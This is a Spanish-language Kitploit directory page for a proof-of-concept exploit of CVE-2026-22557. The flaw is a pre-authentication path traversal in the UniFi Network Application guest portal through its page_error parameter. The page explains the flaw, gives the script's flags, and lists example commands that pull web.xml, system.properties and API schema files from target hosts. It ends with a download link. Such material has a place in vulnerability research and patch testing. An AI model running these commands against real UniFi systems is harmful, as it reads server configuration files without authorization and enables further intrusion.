Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22557-PoC — PoC para el Path Traversal Pre-Autenticación en UniFi Network Application (CVE-2026-22557) | Kitploit
Herramientas/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC para el Path Traversal Pre-Autenticación en UniFi Network Application (CVE-2026-22557)

Ver Repositorio
4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22557 -- Traversal de ruta pre-autenticación en UniFi Network Application

Traversal de ruta pre-autenticado en el portal de invitados de UniFi Network Application (/guest/s/{site}/login). El parámetro de consulta page_error se pasa a un cargador de recursos sin validación, lo que permite a un atacante no autenticado leer archivos de la aplicación web (p. ej. WEB-INF/web.xml).

Si la página del portal de invitados ha sido personalizada, el cargador de recursos parece recurrir a una rama FileInputStream sin procesar que puede acceder a archivos arbitrarios del sistema subyacente fuera del contexto raíz. Aún no lo he confirmado e investigaré más a fondo si tengo tiempo.

Uso

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
FlagDescripciónPredeterminado
targetURL del objetivo (p. ej. https://host:8843)(obligatorio)
-fRuta relativa a leer../../web.xml
-gRuta del portal de invitados/guest/s/default/login
-oEscribir la respuesta en un archivo(salida estándar)
-xURL del proxy(ninguno)

Ejemplos

image
root@kitploit:~
# Predeterminado -- leer WEB-INF/web.xml (portal de invitados HTTPS)
python CVE-2026-22557.py https://192.168.1.1:8843

# Portal de invitados HTTP
python CVE-2026-22557.py http://192.168.1.1:8880

# Leer recurso del classpath
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# Leer el esquema de la API y guardarlo en un archivo
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# Nombre de sitio diferente
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# A través de un proxy
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
Descargar herramienta